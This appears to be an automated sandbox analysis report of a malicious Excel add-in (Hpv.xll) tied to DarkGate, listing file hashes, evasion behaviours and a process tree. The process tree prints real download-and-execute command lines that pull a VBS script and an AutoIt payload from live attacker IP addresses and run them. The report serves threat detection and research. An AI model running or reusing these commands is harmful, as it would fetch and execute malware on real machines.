Analysis
-
max time kernel
141s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
21-09-2023 17:14
Static task
static1
Behavioral task
behavioral1
Sample
Hpv.xll
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Hpv.xll
Resource
win10-20230915-en
General
-
Target
Hpv.xll
-
Size
50KB
-
MD5
d1a45948f411c02136ca98410475de52
-
SHA1
86ce40651326b8a67730da4e429d1bc202d46226
-
SHA256
392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
-
SHA512
22f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0
-
SSDEEP
1536:oUK23Jsm6Nh5wF3s8KjrtN/5TqRGiNwmU2x0X2Y:ICsNh5wF3s8KXHRTviNnAmY
Malware Config
Extracted
darkgate
http://94.228.169.143
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid Process 40 1440 WScript.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
me.execmd.exeWScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation me.exe Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 4 IoCs
Processes:
me.exebpzs.exebpzs.exeAutoit3.exepid Process 1104 me.exe 4384 bpzs.exe 2888 bpzs.exe 1744 Autoit3.exe -
Loads dropped DLL 2 IoCs
Processes:
EXCEL.EXEpid Process 704 EXCEL.EXE 704 EXCEL.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Autoit3.exeEXCEL.EXEdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Autoit3.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Autoit3.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 1248 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 40 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 704 EXCEL.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid Process 704 EXCEL.EXE 704 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
EXCEL.EXEpid Process 704 EXCEL.EXE 704 EXCEL.EXE 704 EXCEL.EXE 704 EXCEL.EXE 704 EXCEL.EXE 704 EXCEL.EXE 704 EXCEL.EXE 704 EXCEL.EXE 704 EXCEL.EXE 704 EXCEL.EXE -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
EXCEL.EXEme.execmd.exeWScript.execmd.exedescription pid Process procid_target PID 704 wrote to memory of 1104 704 EXCEL.EXE 87 PID 704 wrote to memory of 1104 704 EXCEL.EXE 87 PID 1104 wrote to memory of 4700 1104 me.exe 89 PID 1104 wrote to memory of 4700 1104 me.exe 89 PID 4700 wrote to memory of 1084 4700 cmd.exe 91 PID 4700 wrote to memory of 1084 4700 cmd.exe 91 PID 4700 wrote to memory of 1248 4700 cmd.exe 92 PID 4700 wrote to memory of 1248 4700 cmd.exe 92 PID 4700 wrote to memory of 1440 4700 cmd.exe 93 PID 4700 wrote to memory of 1440 4700 cmd.exe 93 PID 1440 wrote to memory of 3096 1440 WScript.exe 94 PID 1440 wrote to memory of 3096 1440 WScript.exe 94 PID 3096 wrote to memory of 4384 3096 cmd.exe 96 PID 3096 wrote to memory of 4384 3096 cmd.exe 96 PID 3096 wrote to memory of 2888 3096 cmd.exe 97 PID 3096 wrote to memory of 2888 3096 cmd.exe 97 PID 3096 wrote to memory of 1744 3096 cmd.exe 98 PID 3096 wrote to memory of 1744 3096 cmd.exe 98 PID 3096 wrote to memory of 1744 3096 cmd.exe 98
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Hpv.xll"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Users\Public\me.exeC:\Users\Public\me.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\1.vbs http://5.42.77.33/QvCY2SE/123&&timeout 10&&c:\\users\\public\\1.vbs', 0); window.close();</script>"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.77.33/QvCY2SE/123&&timeout 10&&c:\users\public\1.vbs3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\curl.exeC:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.77.33/QvCY2SE/1234⤵PID:1084
-
-
C:\Windows\system32\timeout.exetimeout 104⤵
- Delays execution with timeout.exe
PID:1248
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\users\public\1.vbs"4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o vseukw.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe vseukw.au35⤵
- Suspicious use of WriteProcessMemory
PID:3096 -
\??\c:\bpzs\bpzs.exebpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:23516⤵
- Executes dropped EXE
PID:4384
-
-
\??\c:\bpzs\bpzs.exebpzs -o vseukw.au3 http://94.228.169.143:2351/msibpzszuqi6⤵
- Executes dropped EXE
PID:2888
-
-
\??\c:\bpzs\Autoit3.exeAutoit3.exe vseukw.au36⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1744
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD5d1a45948f411c02136ca98410475de52
SHA186ce40651326b8a67730da4e429d1bc202d46226
SHA256392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
SHA51222f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0
-
Filesize
50KB
MD5d1a45948f411c02136ca98410475de52
SHA186ce40651326b8a67730da4e429d1bc202d46226
SHA256392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
SHA51222f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
411KB
MD51c3645ebddbe2da6a32a5f9fb43a3c23
SHA1086f74a35d5afed78ae50cf5586fafffb7845464
SHA2560ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205
SHA512ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b
-
Filesize
411KB
MD51c3645ebddbe2da6a32a5f9fb43a3c23
SHA1086f74a35d5afed78ae50cf5586fafffb7845464
SHA2560ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205
SHA512ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b
-
Filesize
8KB
MD532fa7538ba1ad12bf75dee2ad5664b78
SHA1bcc6d2b34f4d078dafc69f60a55440930f2a6ef9
SHA256c8b878419fd6822551fbfec3a0fb5a56985410b1b92f975c2d792dd62ceaf044
SHA5124ebdbf23321bc1bd02244d58ad6664021691608e06ddb800f9966a9cd36c9b7e4d2ed5c48a6dc003845963523ae8ed19d8b5d4e6b3c27049972cf4743ad68206
-
Filesize
411KB
MD51c3645ebddbe2da6a32a5f9fb43a3c23
SHA1086f74a35d5afed78ae50cf5586fafffb7845464
SHA2560ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205
SHA512ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b
-
Filesize
908KB
MD50ea7d1a7ad1b24835ca0b2fc6c51c15a
SHA1c470650db0b249737b5cf84854292ba0b7ec68f7
SHA256f9e6958800b576b94c26fd16691ca8e1ca7bda7a0abf0a8657d7cb0eb9a696de
SHA5121f3d5738e84a955a053db7ac2c78e4a08154c0022f7d5e130bdce5c41cef25692d2e15a0fe80e641e4ded1308ede5673d1fb7635f5fc7bebe887a239201d4a7b